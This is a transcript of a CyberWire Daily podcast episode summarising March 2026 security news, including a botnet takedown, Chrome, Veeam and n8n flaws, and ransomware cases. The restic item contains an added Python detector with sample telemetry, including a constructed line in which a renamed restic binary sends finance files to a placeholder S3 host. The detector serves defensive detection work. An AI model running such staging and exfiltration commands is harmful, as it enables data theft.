The CyberWire Daily Podcast 3.13.26
Ep 2508 | 3.13.26

Socks pulled, patches pushed.

Transcript

Europol dismantles the SocksEscort proxy service. Cyber operations highlight imbalance in the war in Iran. Google rushes Chrome zero-day patches. Veeam fixes critical backup flaws. A former incident responder faces ransomware charges. Thomson Reuters staff push back on an ICE contract. Attackers abuse backup tools for data theft. CISA flags a critical n8n vulnerability. Maria Varmazis is joined by Jack R. Bialik, engineer and author, to discuss the hidden risks of a fully-digital society, and talk about his book "In Lost in Time: Our Forgotten and Vanishing Knowledge." A phony photo fuels a phantom flight fiasco.

Today is Friday, March 13th, 2026. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

Europol launches Operation Lightning to dismantle SocksEscort.

This week, Europol and international partners launched Operation Lightning to dismantle the criminal proxy service “SocksEscort.” Working with authorities from Austria, France, the Netherlands, the United States, and Eurojust, investigators seized 34 domains and 23 servers across seven countries and froze USD 3.5 million in cryptocurrency. The service relied on a botnet of more than 369,000 compromised routers and Internet of Things devices in 163 countries, primarily residential modems infected through exploited vulnerabilities. Customers paid for access to these hijacked IP addresses, allowing them to conceal their identities while conducting crimes such as ransomware attacks, distributed denial-of-service (DDoS) campaigns, and the distribution of child sexual abuse material. Europol supported the investigation with intelligence analysis, crypto tracing, and coordination, highlighting the importance of international cooperation in disrupting cybercrime infrastructure.

The war in Iran is marked by cyber imbalance. 

An analysis from the International Institute for Strategic Studies looks at the first week of the war between Israel, the United States, and Iran, highlighting a significant imbalance in cyber capabilities. Public reports describe Israeli and US cyber operations that supported military actions, including hacking Tehran’s traffic cameras to time a strike on Iranian leadership, disrupting telecommunications to hinder command-and-control, and briefly taking over a popular prayer app to spread anti-regime messages. Analysts note that these publicly known operations likely represent only a small portion of the broader cyber campaign, with many capabilities remaining undisclosed.

Israel and the US are expected to prioritize cyber operations for intelligence gathering and information operations, occasionally integrating them with kinetic strikes. Iran, by contrast, has relied heavily on proxy groups and hacktivists conducting distributed denial-of-service attacks, website defacements, and hack-and-leak campaigns. While disruptive, these activities are often more symbolic than strategic. Governments worldwide have warned organizations to strengthen defenses, as Iranian actors and proxies may target countries beyond Israel and the US.

Google issues emergency security updates for Chrome. 

Google has issued emergency security updates for Chrome to fix two high-severity vulnerabilities, CVE-2026-3909 and CVE-2026-3910, which are already being exploited in the wild. The first flaw involves an out-of-bounds write in the Skia graphics library that could allow attackers to crash the browser or execute code. The second affects the V8 JavaScript and WebAssembly engine. Google patched the issues within two days and released updates for Windows, macOS, and Linux in Chrome version 146.0.7680.75/76. Users are advised to update their browsers as rollout may take time.

Veeam patches multiple vulnerabilities in its Backup & Replication software. 

Veeam has patched multiple vulnerabilities in its Backup & Replication (VBR) software, including four critical remote code execution flaws. Three of the vulnerabilities allow low-privileged domain users to execute code on vulnerable backup servers, while another enables a Backup Viewer to gain code execution as the postgres user. Additional high-severity bugs could allow privilege escalation, SSH credential extraction, or manipulation of files on backup repositories. The issues were fixed in versions 12.3.2.4465 and 13.0.1.2067. Veeam urges administrators to update quickly, as backup servers are frequent ransomware targets and attackers often reverse-engineer patches to exploit unpatched systems.

Prosecutors say a former IR staffer exploited trusted access for a ransomware campaign. 

The U.S. Department of Justice has charged Angelo Martino, a former employee of an incident response firm, for allegedly participating in a ransomware extortion scheme linked to the BlackCat (ALPHV) group. Between April 2023 and April 2025, Martino reportedly acted as a direct affiliate, working with two other former cybersecurity professionals to exploit their trusted roles and demand ransom payments from victims. Prosecutors allege the group targeted at least 10 U.S. organizations across sectors including healthcare, finance, manufacturing, and retail, threatening to leak stolen data unless payments were made. In one case, a Tampa-based medical device manufacturer reportedly paid about $1.27 million in cryptocurrency. Investigators say the conspirators shared roughly 20% of ransom proceeds with BlackCat administrators. The case highlights the growing risk of insider threats within the cybersecurity and incident response industry.

Thomson Reuters employees urge company leadership not to renew a multi-million dollar contract with ICE. 

More than 200 Thomson Reuters employees are urging company leadership not to renew a $22.8 million contract with U.S. Immigration and Customs Enforcement (ICE) that provides investigative software capable of gathering public and private data and tracking license plates. The protest is concentrated among employees in Minnesota, where ICE operations under “Operation Metro Surge” directly affected local communities. Workers say arrests, intimidation, and violence linked to enforcement actions have made the issue personal, prompting concerns that the company’s tools could be used to identify or harass individuals. The internal push gained momentum after an online post listed companies working with ICE, sparking internal discussions and organizing among staff. Thomson Reuters said it supports investigations related to national security and public safety while maintaining safeguards to ensure lawful use of its products. Employee groups and some shareholders are calling for stronger human rights oversight.

Attackers use a renamed backup tool to steal data before a ransomware strike. 

Huntress SOC analysts investigated a ransomware incident in which attackers used the backup tool restic to stage and exfiltrate data before deploying INC ransomware. The threat actor accessed a compromised endpoint on 24 February 2026, mapped a network share, elevated privileges with PsExec, and created a scheduled task to execute a PowerShell script. The script configured AWS credentials and a Wasabi S3 repository, then ran a renamed copy of restic (winupdate.exe) to back up selected files for exfiltration. Limited visibility hindered early detection because the Huntress agent was not fully deployed and the victim lacked a SIEM system. On 25 February, the attacker removed security tools, disabled Windows Defender, and launched the ransomware. Analysts noted similar activity in an earlier February incident and referenced comparable findings reported by Cyber Centaurs, suggesting a repeatable attacker technique.
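The staging pattern described above (a scheduled task running PowerShell that seeds cloud credentials, then a renamed restic binary backing up to an S3-compatible repository) can be matched from process-creation telemetry. The following detector is an added example, not code from the episode or from Huntress; it assumes Sysmon-style fields (Image, OriginalFileName, CommandLine) and runs over constructed sample records with placeholder values.

```python
import re

# restic markers: a "backup" subcommand whose repository (-r / --repo) is S3-style,
# plus the environment variables restic and the AWS SDK read for secrets.
RESTIC_S3_BACKUP = re.compile(r"(?:-r|--repo)\s+s3:\S+.*\bbackup\b", re.IGNORECASE)
SECRET_ENV = ("RESTIC_PASSWORD", "RESTIC_REPOSITORY",
              "AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY")


def classify(event):
    """Return detection reasons for one Sysmon-like process-creation record."""
    reasons = []
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    original = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "")
    low = cmd.lower()
    if original == "restic.exe" and image != "restic.exe":
        # PE version info still says restic.exe although the file was renamed.
        reasons.append(f"renamed restic binary running as {image}")
    if RESTIC_S3_BACKUP.search(cmd):
        reasons.append("restic backup to S3 repository")
    if image in ("powershell.exe", "pwsh.exe") and any(v in cmd for v in SECRET_ENV):
        reasons.append("powershell sets backup/cloud credential variables")
    if image == "schtasks.exe" and "/create" in low and "powershell" in low:
        reasons.append("scheduled task created to run powershell")
    return reasons


def scan(events):
    """Return [(file name, reasons)] for each event matching at least one rule."""
    hits = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            hits.append((ev["Image"].rsplit("\\", 1)[-1], reasons))
    return hits


# Constructed sample telemetry: paths, bucket and credentials are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks /create /tn Updater /tr "powershell -File C:\Temp\stage.ps1" /sc once'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell -c \"$env:AWS_ACCESS_KEY_ID='PLACEHOLDER'; $env:RESTIC_PASSWORD='PLACEHOLDER'\""},
    {"Image": r"C:\Temp\winupdate.exe", "OriginalFileName": "restic.exe",
     "CommandLine": r"winupdate.exe -r s3:s3.example-bucket.invalid/stage backup D:\Finance"},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": r"notepad.exe C:\Users\a\notes.txt"},
]
```

Each rule alone is noisy in an environment that legitimately uses restic or AWS tooling; the value is in correlating them on one host within a short window, which is what the incident timeline above shows.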

CISA tags a vulnerability in the n8n automation platform. 

CISA has added CVE-2025-68613, a critical remote code execution vulnerability in the open-source workflow automation platform n8n, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw allows authenticated attackers to execute arbitrary code with the same privileges as the n8n process, potentially leading to full system compromise. The vulnerability affects versions from 0.211.0 until patched releases 1.120.4, 1.121.1, and 1.122.0. Proof-of-concept exploits show attackers can abuse JavaScript expressions in workflows to run system commands. Federal agencies must patch the issue by March 25, 2026. Researchers previously identified over 100,000 potentially exposed instances, with tens of thousands still vulnerable earlier this year.

A phony photo fuels a phantom flight fiasco.

In early March, as Dutch travelers scrambled to leave the Gulf amid rising tensions, De Telegraaf published a hopeful story: a woman in Dubai, Tamara Harema, was reportedly organizing private evacuation flights home. Seats on a chartered Airbus A321 were said to cost €1,600, and demand was apparently brisk.

Bellingcat soon took a closer look, and things unraveled rather quickly. Harema’s photo showed several telltale signs of generative AI, including distorted objects and architectural details around Dubai’s Burj Khalifa that did not match reality. The supposed evacuation flight also proved elusive. Flight-tracking data showed no Airbus A321 departing Muscat for the Netherlands on the dates mentioned.

After Bellingcat raised questions, the newspaper quietly removed the image, noting it likely failed to meet journalistic standards. The interview remains online, leaving readers with a curious modern mystery: a humanitarian flight effort that may have existed mainly in pixels and good intentions.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

Research Saturday plug. 

This week on Research Saturday, we’re joined by Or Eshed, Co-Founder and CEO of LayerX Security, to discuss their research uncovering a campaign of 16 malicious browser extensions disguised as ChatGPT productivity tools.

These extensions secretly capture ChatGPT session tokens, allowing attackers to hijack accounts and access conversations, files, and connected services like Google Drive or Slack.

And that’s the CyberWire Daily, brought to you by N2K CyberWire.

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com.

We’re proud that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K helps cybersecurity professionals and organizations grow, learn, and stay ahead. We’re the nexus for discovering the people, tech, and ideas shaping the industry. Learn how at n2k.com.

N2K’s lead producer is Liz Stokes. We’re mixed by Tré Hester, with original music and sound design by Elliott Peltzman. Our contributing host is Maria Varmazis. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher. And I’m Dave Bittner. Thanks for listening.